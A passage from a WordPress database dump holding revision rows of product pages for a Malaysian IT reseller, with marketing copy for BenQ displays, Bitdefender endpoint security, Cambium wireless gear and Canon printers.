picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.</p><p>Whether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQâ€™s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.</p><p>Featuring an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.</p><h4>Â </h4><h5>How BenQ Display turns meeting rooms into places of efficiency</h5><ul><li>Present content wirelessly and instantly withÂ InstaShow<sup>TM</sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly</li><li>Display stunningly bright, crystal clear images with reliable, flexibleÂ Business ProjectorsÂ that capture staff attention, while simultaneously streamlining company meetings</li><li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible onÂ Business Projectors,Â even in large boardrooms</li><li>With BenQâ€™sÂ Smart DisplayÂ plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.</li></ul><p>Â </p><center>[maxbutton id=\"1\" ]</center><p>Â </p>','BenQ','','inherit','closed','closed','','2834-revision-v1','','','2019-09-24 14:34:23','2019-09-24 06:34:23','',2834,'https://bintara.com.my/blog/2019/09/24/2834-revision-v1/',0,'revision','',0),(3278,1,'2019-09-24 14:32:32','2019-09-24 06:32:32','<h1>Projectors</h1>\n<h3></h3>\n<h2>Business Projector (Smart Design for Presentations)</h2>\n<h3>High Brightness for Well-Lit Rooms</h3>\n<p>Ideal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.</p>\n<p>&nbsp;</p>\n<h2>Interactive Classroom Projectors</h2>\n<h3>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms</h3>\n<p>Futureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short / ultra-short throw projection based on brilliant laser or lamp light sources.</p>\n<ul>\n<li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM</sup></li>\n<li>High Brightness from 3000-3500 ANSI Lumens</li>\n<li>High resolution with (Ultra) Short Throw</li>\n<li>Scalable for Wireless Use and Interactivity</li>\n</ul>\n<h3></h3>\n<h1>Interactive Flat Panel</h1>\n<h4></h4>\n<h2>Meeting Room &amp; Boardroom</h2>\n<p>Digital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.</p>\n<p>&nbsp;</p>\n<h3>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G</h3>\n<h5>Work Collaboratively and Conduct Business Efficiently</h5>\n<p>The RP840G is a modern enterpriseâ€™s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.</p>\n<p>Whether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQâ€™s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.</p>\n<p>Featuring an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.</p>\n<h4><br></h4><h5>How BenQ Display turns meeting rooms into places of efficiency</h5>\n<ul>\n<li>Present content wirelessly and instantly with&nbsp;InstaShow<sup>TM</sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly</li>\n<li>Display stunningly bright, crystal clear images with reliable, flexible&nbsp;Business Projectors&nbsp;that capture staff attention, while simultaneously streamlining company meetings</li>\n<li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible on&nbsp;Business Projectors,&nbsp;even in large boardrooms</li>\n<li>With BenQâ€™s&nbsp;Smart Display&nbsp;plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.</li>\n</ul>\n<center>[maxbutton id=\"1\" ]</center>','BenQ','','inherit','closed','closed','','2834-revision-v1','','','2019-09-24 14:32:32','2019-09-24 06:32:32','',2834,'https://bintara.com.my/blog/2019/09/24/2834-revision-v1/',0,'revision','',0),(3280,1,'2019-09-24 14:48:57','2019-09-24 06:48:57','<h1>Projectors</h1><h3>Â </h3><h2>Business Projector (Smart Design for Presentations)</h2><h3>High Brightness for Well-Lit Rooms</h3><p>Ideal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.</p><p>Â </p><h2>Interactive Classroom Projectors</h2><h3>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms</h3><p>Futureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short / ultra-short throw projection based on brilliant laser or lamp light sources.</p><ul><li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM</sup></li><li>High Brightness from 3000-3500 ANSI Lumens</li><li>High resolution with (Ultra) Short Throw</li><li>Scalable for Wireless Use and Interactivity</li></ul><h3>Â </h3><h2>Interactive Flat Panel</h2><h3>Meeting Room &amp; Boardroom</h3><p>Digital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.</p><p>Â </p><h3>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G</h3><h5>Work Collaboratively and Conduct Business Efficiently</h5><p>The RP840G is a modern enterpriseâ€™s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.</p><p>Whether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQâ€™s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.</p><p>Featuring an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.</p><h4>Â </h4><h5>How BenQ Display turns meeting rooms into places of efficiency</h5><ul><li>Present content wirelessly and instantly withÂ InstaShow<sup>TM</sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly</li><li>Display stunningly bright, crystal clear images with reliable, flexibleÂ Business ProjectorsÂ that capture staff attention, while simultaneously streamlining company meetings</li><li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible onÂ Business Projectors,Â even in large boardrooms</li><li>With BenQâ€™sÂ Smart DisplayÂ plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.</li></ul><p>Â </p><center>[maxbutton id=\"1\" ]</center><p>Â </p>','BenQ','','inherit','closed','closed','','2834-revision-v1','','','2019-09-24 14:48:57','2019-09-24 06:48:57','',2834,'https://bintara.com.my/blog/2019/09/24/2834-revision-v1/',0,'revision','',0),(3281,1,'2019-09-24 14:55:02','2019-09-24 06:55:02','<h2>Protect Your Endpoints with Layered Next-Gen Security, now with EDR</h2><h3>Itâ€™s Time to Rethink Endpoint Security<br />Protect Endpoints</h3><p>Organizations around the globe are facing an era of increasingly sophisticated attacks with never before seen global outbreaks of cyber threats. With increasing complexity and mobility of endpoints but limited resources and security staff shortage, companies are falling behind. As a consequence over half of breaches start with a compromised endpoint. Itâ€™s time to rethink endpoint security! <br />Bitdefender developed GravityZone to be an effective defense for enterprise digital assets against the entire range of cyberthreats, from common ones to the most sophisticated cyberthreats. The industry leading prevention that relies on the accurate machine learning technologies and behavior analytics coupled with response automation and the new easy-to-use EDR, delivers un-paralleled protection and threat visibility while keeping the resources and capabilities requirements low.</p>		\n			<h2>Product</h2>		\n		<h3><strong>GravityZone Elite SuiteÂ </strong></h3><p>Layered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.</p><h3><strong>GravityZone Ultra SuiteÂ </strong></h3><p>GravityZone Ultra integrates layered next-gen endpoint protection and easy-to-use EDR platform to accurately protect enterprises against even the most elusive cyber threats.</p><h3><strong>GravityZone Enterprise Security</strong></h3><p>Bitdefenderâ€™s Enterprise Security delivers layered next-gen security that consistently ranks first in independent tests. It leverages a single management platform to reduce the cost of building a trusted environment for all endpoints.</p><h2>Protect all devices</h2><h3>Anti Ransomware</h3><p>Ransomware has quickly become one of the most infectious and feared threats in business environments. Ironically, the main cost is not the ransom itself, but the business downtime it causes â€“ so it is not surprising that only a third of businesses believe they will recover from a ransomware attack without significant losses.</p><h3 id=\"products\">Products</h3><p>All Bitdefender endpoint solutions protect your enterprise endpoints against ransomware.</p><h3><strong>GravityZone Elite SuiteÂ </strong></h3><p>Layered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.</p><h3><strong>GravityZone Security for Endpoints </strong></h3><p>Solution designed to protect on-premise deployments, delivering prevention, detection, remediation and visibility in a single modular platform.</p><h3><strong>GravityZone Advanced Business Security </strong></h3><p>Bundle of security features and solutions delivering layered protection, including: machine learning anti-malware, behavioral analysis, anti-ransomware, advanced anti-exploit, continuous monitoring of running processes and many more.</p><p>To discover more, please click the button below or contact us to discuss your needs.</p><center>[maxbutton id=\"1\" ]</center>','Bitdefender','','inherit','closed','closed','','1448-revision-v1','','','2019-09-24 14:55:02','2019-09-24 06:55:02','',1448,'https://bintara.com.my/blog/2019/09/24/1448-revision-v1/',0,'revision','',0),(3284,1,'2019-09-24 15:02:33','2019-09-24 07:02:33','<h2>Solutions for all your wireless needs</h2><p>Â </p><h3><strong>Local Government</strong></h3><p>Connect events, people, and places with the reliable technology that provides the highest throughput at the lowest total cost. Local governments have deployed wireless connectivity to create city hotspots, monitor facilities, and connect events.</p><h3><strong>Higher Education</strong></h3><p>Classrooms, dormitories, research labs, auditoriums, and stadiums go dark. Every aspect of higher education depends on being connected, and wireless solutions from Cambium Networks provide affordable quality in end-to-end connectivity. Rapidly deploy the network you need at a fraction of the cost of leased lines or fiber build-outs.</p><h3><strong>Regional Service Providers</strong></h3><p>Wireless broadband solutions that operate in both the licensed and unlicensed spectrum are proven to connect millions of users around the world, and technology from Cambium Networks is designed to provide the spectral efficiency, coverage, and capacity to offer consistently reliable wireless connectivity to business and residential subscribers.</p><h3><strong>Oil and Gas</strong></h3><p>Wireless network connectivity for data transfer, SCADA monitoring and control, and video surveillance at indoor and outdoor locations. Contact us for more information.</p><h3><strong>Small Medium Business Retail</strong></h3><p>Connectivity provides immediate access to information and improves efficiency throughout the business. Small and medium businesses can move fast to integrate technology into their business process and experience the benefits.</p><h3><strong>Managed Service Providers</strong></h3><p>cnPilot Wi-Fi technology with cnMaestro controller management support the MSPs delivery of trouble-free service to customers, reduce the total operating costs and protect their clientsâ€™ bottom lines.</p><h3><strong>Federal Government</strong></h3><p>Our field-proven, agency-vetted solutions provide reliable broadband for video, voice, and data applications.</p><h3><strong>Retail</strong></h3><p>Connectivity is changing the retail experience. Retailers can improve store efficiency while providing customers with the Wi-Fi connectivity that enhances their shopping experience</p><h3><strong>Smart Cities</strong></h3><p>Wireless broadband provides high-speed, rapidly deployed connectivity for WiFi, video surveillance, data transfer, and SCADA control.</p><center>[maxbutton id=\"1\" ]</center>','Cambium','','inherit','closed','closed','','1451-revision-v1','','','2019-09-24 15:02:33','2019-09-24 07:02:33','',1451,'https://bintara.com.my/blog/2019/09/24/1451-revision-v1/',0,'revision','',0),(3283,1,'2019-09-24 15:01:51','2019-09-24 07:01:51','<h2>Solutions for all your wireless needs</h2><p>Â </p><h3><strong>Local Government</strong></h3><p>Connect events, people, and places with the reliable technology that provides the highest throughput at the lowest total cost. Local governments have deployed wireless connectivity to create city hotspots, monitor facilities, and connect events.</p><h3><strong>Higher Education</strong></h3><p>Classrooms, dormitories, research labs, auditoriums, and stadiums go dark. Every aspect of higher education depends on being connected, and wireless solutions from Cambium Networks provide affordable quality in end-to-end connectivity. Rapidly deploy the network you need at a fraction of the cost of leased lines or fiber build-outs.</p><h3><strong>Regional Service Providers</strong></h3><p>Wireless broadband solutions that operate in both the licensed and unlicensed spectrum are proven to connect millions of users around the world, and technology from Cambium Networks is designed to provide the spectral efficiency, coverage, and capacity to offer consistently reliable wireless connectivity to business and residential subscribers.</p><h3><strong>Oil and Gas</strong></h3><p>Wireless network connectivity for data transfer, SCADA monitoring and control, and video surveillance at indoor and outdoor locations. Contact us for more information.</p><h3><strong>Small Medium Business Retail</strong></h3><p>Connectivity provides immediate access to information and improves efficiency throughout the business. Small and medium businesses can move fast to integrate technology into their business process and experience the benefits.</p><h3><strong>Managed Service Providers</strong></h3><p>cnPilot Wi-Fi technology with cnMaestro controller management support the MSPs delivery of trouble-free service to customers, reduce the total operating costs and protect their clientsâ€™ bottom lines.</p><h3><strong>Federal Government</strong></h3><p>Our field-proven, agency-vetted solutions provide reliable broadband for video, voice, and data applications.</p><h3><strong>Retail</strong></h3><p>Connectivity is changing the retail experience. Retailers can improve store efficiency while providing customers with the Wi-Fi connectivity that enhances their shopping experience</p><h3><strong>Smart Cities</strong></h3><p>Wireless broadband provides high-speed, rapidly deployed connectivity for WiFi, video surveillance, data transfer, and SCADA control.</p><center></center><center>[maxbutton id=\"1\" ]</center>','Cambium','','inherit','closed','closed','','1451-revision-v1','','','2019-09-24 15:01:51','2019-09-24 07:01:51','',1451,'https://bintara.com.my/blog/2019/09/24/1451-revision-v1/',0,'revision','',0),(3286,1,'2019-09-24 15:04:06','2019-09-24 07:04:06','<h2>Solutions for all your wireless needs</h2><p>Â </p><h3><strong>Local Government</strong></h3><p>Connect events, people, and places with the reliable technology that provides the highest throughput at the lowest total cost. Local governments have deployed wireless connectivity to create city hotspots, monitor facilities, and connect events.</p><h3><strong>Higher Education</strong></h3><p>Classrooms, dormitories, research labs, auditoriums, and stadiums go dark. Every aspect of higher education depends on being connected, and wireless solutions from Cambium Networks provide affordable quality in end-to-end connectivity. Rapidly deploy the network you need at a fraction of the cost of leased lines or fiber build-outs.</p><h3><strong>Regional Service Providers</strong></h3><p>Wireless broadband solutions that operate in both the licensed and unlicensed spectrum are proven to connect millions of users around the world, and technology from Cambium Networks is designed to provide the spectral efficiency, coverage, and capacity to offer consistently reliable wireless connectivity to business and residential subscribers.</p><h3><strong>Oil and Gas</strong></h3><p>Wireless network connectivity for data transfer, SCADA monitoring and control, and video surveillance at indoor and outdoor locations. Contact us for more information.</p><h3><strong>Small Medium Business Retail</strong></h3><p>Connectivity provides immediate access to information and improves efficiency throughout the business. Small and medium businesses can move fast to integrate technology into their business process and experience the benefits.</p><h3><strong>Managed Service Providers</strong></h3><p>cnPilot Wi-Fi technology with cnMaestro controller management support the MSPs delivery of trouble-free service to customers, reduce the total operating costs and protect their clientsâ€™ bottom lines.</p><h3><strong>Federal Government</strong></h3><p>Our field-proven, agency-vetted solutions provide reliable broadband for video, voice, and data applications.</p><h3><strong>Retail</strong></h3><p>Connectivity is changing the retail experience. Retailers can improve store efficiency while providing customers with the Wi-Fi connectivity that enhances their shopping experience</p><h3><strong>Smart Cities</strong></h3><p>Wireless broadband provides high-speed, rapidly deployed connectivity for WiFi, video surveillance, data transfer, and SCADA control.</p><center></center><center>[maxbutton id=\"1\" ]</center><p>Â </p>','Cambium','','inherit','closed','closed','','1451-revision-v1','','','2019-09-24 15:04:06','2019-09-24 07:04:06','',1451,'https://bintara.com.my/blog/2019/09/24/1451-revision-v1/',0,'revision','',0),(3287,1,'2019-09-24 15:04:35','2019-09-24 07:04:35','<h2>Solutions for all your wireless needs</h2><p>Â </p><h3><strong>Local Government</strong></h3><p>Connect events, people, and places with the reliable technology that provides the highest throughput at the lowest total cost. Local governments have deployed wireless connectivity to create city hotspots, monitor facilities, and connect events.</p><h3><strong>Higher Education</strong></h3><p>Classrooms, dormitories, research labs, auditoriums, and stadiums go dark. Every aspect of higher education depends on being connected, and wireless solutions from Cambium Networks provide affordable quality in end-to-end connectivity. Rapidly deploy the network you need at a fraction of the cost of leased lines or fiber build-outs.</p><h3><strong>Regional Service Providers</strong></h3><p>Wireless broadband solutions that operate in both the licensed and unlicensed spectrum are proven to connect millions of users around the world, and technology from Cambium Networks is designed to provide the spectral efficiency, coverage, and capacity to offer consistently reliable wireless connectivity to business and residential subscribers.</p><h3><strong>Oil and Gas</strong></h3><p>Wireless network connectivity for data transfer, SCADA monitoring and control, and video surveillance at indoor and outdoor locations. Contact us for more information.</p><h3><strong>Small Medium Business Retail</strong></h3><p>Connectivity provides immediate access to information and improves efficiency throughout the business. Small and medium businesses can move fast to integrate technology into their business process and experience the benefits.</p><h3><strong>Managed Service Providers</strong></h3><p>cnPilot Wi-Fi technology with cnMaestro controller management support the MSPs delivery of trouble-free service to customers, reduce the total operating costs and protect their clientsâ€™ bottom lines.</p><h3><strong>Federal Government</strong></h3><p>Our field-proven, agency-vetted solutions provide reliable broadband for video, voice, and data applications.</p><h3><strong>Retail</strong></h3><p>Connectivity is changing the retail experience. Retailers can improve store efficiency while providing customers with the Wi-Fi connectivity that enhances their shopping experience</p><h3><strong>Smart Cities</strong></h3><p>Wireless broadband provides high-speed, rapidly deployed connectivity for WiFi, video surveillance, data transfer, and SCADA control.</p><p>Â </p><center></center><center></center><center>[maxbutton id=\"1\" ]</center><p>Â </p>','Cambium','','inherit','closed','closed','','1451-revision-v1','','','2019-09-24 15:04:35','2019-09-24 07:04:35','',1451,'https://bintara.com.my/blog/2019/09/24/1451-revision-v1/',0,'revision','',0),(3318,1,'2019-09-25 08:33:57','2019-09-25 00:33:57','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h2>Laser Printers :-</h2>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity</strong></p><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p>\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p>\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 